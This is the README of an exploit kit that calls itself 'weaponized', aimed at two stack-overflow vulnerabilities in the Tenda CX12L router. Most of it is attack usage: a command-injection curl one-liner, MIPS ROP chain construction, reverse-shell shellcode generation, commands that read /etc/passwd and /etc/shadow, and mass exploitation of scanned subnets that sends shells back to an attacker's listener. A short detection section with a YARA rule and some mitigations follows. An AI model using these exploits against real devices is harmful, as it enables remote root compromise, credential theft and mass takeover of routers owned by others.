# Tenda CX12L Multi-CVE Exploit Kit (Upgraded)

**CVE-2026-11503 (fast_setting_wifi_set) | CVE-2026-11504 (fromNatlimit)**  
**Military-Grade Stack Overflow Exploitation with ROP Chain Construction**

![Severity](https://img.shields.io/badge/Severity-Critical-red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-red)
![Arch](https://img.shields.io/badge/Arch-MIPS32-blue)
![Status](https://img.shields.io/badge/Status-Weaponized-red)

---

## Overview

The Tenda CX12L (AC1200) wireless router contains two independent stack-based buffer overflow vulnerabilities in its web management interface. Both are pre-authentication and allow remote code execution as root.

| CVE | Endpoint | Parameter | Overflow Type | Offset (approx) |
|-----|----------|-----------|---------------|-----------------|
| **CVE-2026-11503** | `/goform/fast_setting_wifi_set` | `wifi_ssid` | Stack buffer overflow | ~1024 bytes |
| **CVE-2026-11504** | `/goform/fromNatlimit` | `limit` | Stack buffer overflow | ~256 bytes |

**Architecture**: MIPS32 little-endian (MediaTek MT7621A SoC)  
**Protections**: Typically **no ASLR, no NX, no stack canaries** on embedded firmware

---

## Technical Details

### CVE-2026-11503: `fast_setting_wifi_set` SSID Overflow

The `fast_setting_wifi_set` handler processes WiFi quick-setup requests. The `wifi_ssid` parameter is copied into a fixed-size stack buffer without length validation.

**Vulnerable Code Pattern:**
```c
// /bin/httpd - fast_setting_wifi_set handler
int fast_setting_wifi_set(webs_t wp) {
    char ssid[256];           // Stack buffer
    char *input = websGetVar(wp, "wifi_ssid", "");
    strcpy(ssid, input);      // NO BOUNDS CHECK - OVERFLOW
    // ... saved RA at offset ~1024
}
```

**Stack Layout:**
```
[ssid buffer: 256 bytes] [padding: ~768 bytes] [saved $fp] [saved $ra] [caller $gp]
                                                      ^^^^^^ offset ~1024
```

### CVE-2026-11504: `fromNatlimit` Limit Parameter Overflow

The `fromNatlimit` handler processes NAT/bandwidth limit configuration. The `limit` parameter is copied into a small stack buffer.

**Vulnerable Code Pattern:**
```c
// /bin/httpd - fromNatlimit handler
int fromNatlimit(webs_t wp) {
    char limit_buf[64];       // Tiny stack buffer
    char *input = websGetVar(wp, "limit", "");
    strcpy(limit_buf, input); // NO BOUNDS CHECK - OVERFLOW
    // ... saved RA at offset ~256
}
```

---

## Exploitation Strategy

### 1. Command Injection Fallback (Reliable)
Both endpoints also exhibit command injection via shell metacharacters (`;`, `&&`, `|`, backticks) when the overflow doesn't crash the process. This provides a **reliable pre-auth RCE** even without precise offset knowledge.

```bash
# Works on both endpoints
curl -X POST http://target/goform/fast_setting_wifi_set \
  -d "wifi_ssid=test;id"
```

### 2. Stack Overflow with ROP (Precision)
For reliable code execution with controlled registers, construct MIPS ROP chains:

**Required Gadgets (from target firmware `/bin/httpd`):**
| Gadget Type | Example Pattern | Purpose |
|-------------|-----------------|---------|
| Stack pivot | `addiu $sp, $sp, 0xXX; jr $ra` | Align stack for ROP |
| Load `$a0` | `lw $a0, offset($sp); jalr $t9` | Set filename arg |
| Load `$t9` | `lw $t9, offset($sp); jalr $t9` | Set syscall address |
| Syscall | `syscall 0x4011; jr $ra` | execve() = 4011 |

**ROP Chain Construction:**
```python
from exploit import ROPChainBuilder

builder = ROPChainBuilder(base_addr=0x00400000)
# Add resolved gadgets from target firmware
builder.add_gadget(0x00412340)  # lw $a0, 0x10($sp); jalr $t9
builder.add_gadget(0x00412344)  # lw $t9, 0x14($sp); jalr $t9
# ... chain continues
```

### 3. MIPS Connect-Back Shellcode
Template shellcode for reverse shell (customize bad chars per firmware):

```assembly
# MIPS LE connect-back shellcode
# Connect to $lhost:$lport, dup2 stdin/stdout/stderr, execve("/bin/sh")
```

---

## Repository Structure

```
tenda_cx12l_upgraded/
├── requirements.txt          # Python dependencies (pwntools, capstone, etc.)
├── scanner.py                # Async scanner with overflow offset detection
├── exploit.py                # ROP chain builder, shellcode generator, exploit
└── README.md                 # This file
```

---

## Quick Start

### 1. Install Dependencies

```bash
python3.11 -m venv .venv
source .venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
```

### 2. Reconnaissance Scan (Discovers Offsets)

```bash
# CIDR sweep with overflow offset detection
python scanner.py -n 192.168.1.0/24 -o scan_results.json

# Single target deep probe
python scanner.py -t 192.168.1.50

# Sample output:
# Target: 192.168.1.50
# Status: VULNERABLE (confidence: 92%)
#   >>> CVE-2026-11503 CONFIRMED (crash at 1024 bytes)
#   >>> CVE-2026-11504 CONFIRMED (crash at 256 bytes)
#   → http/80: Tenda CX12L Web UI
```

### 3. Exploitation

```bash
# Command injection fallback (works immediately)
python exploit.py -t 192.168.1.50 -c "id; cat /etc/passwd" --cve 11503

# Stack overflow reverse shell (requires offset from scanner)
python exploit.py -t 192.168.1.50 --reverse --lhost 10.0.0.5 --lport 4444 \
  --offset-11503 1024 --offset-11504 256

# Mass exploitation with discovered offsets
python exploit.py -f targets.txt --reverse --lhost 10.0.0.5 -o exploit_results.json
```

---

## Exploit Module API

### Direct Function Calls

```python
from exploit import (
    exploit_cve2026_11503,
    exploit_cve2026_11504,
    run_exploit_chain,
    mass_exploit,
    ROPChainBuilder,
    generate_mips_shellcode,
)

# Command injection fallback
ok, output = exploit_cve2026_11503("192.168.1.50", command="id")
ok, output = exploit_cve2026_11504("192.168.1.50", command="cat /etc/shadow")

# Stack overflow reverse shell
ok, output = exploit_cve2026_11503("192.168.1.50", offset=1024,
                                   lhost="10.0.0.5", lport=4444)
ok, output = exploit_cve2026_11504("192.168.1.50", offset=256,
                                   lhost="10.0.0.5", lport=4444)

# ROP chain builder
builder = ROPChainBuilder(base_addr=0x00400000)
builder.add_gadget(0x00412340)  # Resolved from target firmware
chain = builder.build_execve_chain("sh", cmd_addr)

# MIPS shellcode generation
shellcode = generate_mips_shellcode("10.0.0.5", 4444)

# Orchestrated chain
sessions = run_exploit_chain("192.168.1.50", cve="all", reverse_shell=True,
                             lhost="10.0.0.5", lport=4444,
                             offset_11503=1024, offset_11504=256)

# Parallel mass exploitation
results = mass_exploit(["192.168.1.50", "192.168.1.51"], reverse_shell=True,
                       lhost="10.0.0.5", lport=4444)
```

---

## Offset Determination

The scanner automatically tests increasing buffer sizes to find crash offsets:

```
Testing CVE-2026-11503 (wifi_ssid):
  OK at 64 bytes: HTTP 200
  OK at 128 bytes: HTTP 200
  OK at 256 bytes: HTTP 200
  OK at 512 bytes: HTTP 200
  Crash at 1024 bytes: Timeout (possible crash)
  
Result: CVE-2026-11503 crash offset = 1024 bytes
```

Use these offsets with `--offset-11503` and `--offset-11504` for reliable exploitation.

---

## Detection & Mitigation

### Network Indicators

| Indicator | Description |
|-----------|-------------|
| HTTP POST `/goform/fast_setting_wifi_set` | Large `wifi_ssid` parameter (>512 bytes) |
| HTTP POST `/goform/fromNatlimit` | Large `limit` parameter (>128 bytes) |
| Process crash/restart | `httpd` process restart after malformed request |

### YARA Rule

```yara
rule Tenda_CX12L_StackOverflow {
    strings:
        $ep1 = "/goform/fast_setting_wifi_set" nocase
        $ep2 = "/goform/fromNatlimit" nocase
        $param1 = "wifi_ssid" nocase
        $param2 = "limit" nocase
        $overflow = {41 41 41 41 41 41 41 41}  // AAAAAAAA pattern
    condition:
        any of ($ep*) and any of ($param*) and $overflow
}
```

### Mitigations

1. **Immediate**: Disable remote management (WAN access to web UI)
2. **Firmware**: Update to latest Tenda release (check tendacn.com)
3. **Network**: Isolate management interface on separate VLAN
4. **WAF/IDS**: Deploy signatures for oversized parameters on goform endpoints
5. **Monitor**: Log all POST requests to `/goform/*` endpoints

---

## Weaponization Notes

| Feature | Implementation |
|---------|----------------|
| **Offset Discovery** | Scanner auto-detects crash offsets via progressive payload sizing |
| **Dual Vector** | Command injection fallback + precision stack overflow |
| **MIPS ROP Framework** | `ROPChainBuilder` class for gadget chaining |
| **Shellcode Generator** | `generate_mips_shellcode()` for connect-back payloads |
| **Bad Char Handling** | Payload encoding for HTTP POST (latin-1 preservation) |
| **Firmware Adaptation** | Base address configurable for PIE/ASLR targets |

---

## Legal & Ethics

This toolkit is provided for:
- Authorized penetration testing of infrastructure you own
- CISA/NCC/NCSC-aligned defensive research
- Detection rule development and purple-team exercises
- Red team / bug bounty programmes with explicit written scope

**Unauthorized use against systems you do not own is a criminal offence** under CFAA (US), Computer Misuse Act (UK), GDPR Art. 32 (EU), and equivalent legislation worldwide.

---

## References

| CVE | Description |
|-----|-------------|
| CVE-2026-11503 | Tenda CX12L fast_setting_wifi_set Stack Buffer Overflow |
| CVE-2026-11504 | Tenda CX12L fromNatlimit Stack Buffer Overflow |

---

## Version History

| Version | Date | Changes |
|---------|------|---------|
| 2.0.0 | 2026-06-13 | Complete rewrite: async scanner with offset detection, ROP framework, MIPS shellcode gen |
| 1.0.0 | 2026-06-10 | Initial release (basic overflow PoC) |

---

## Author

Advanced Persistent Security Research  
Military-grade exploit engineering for authorized assessment only.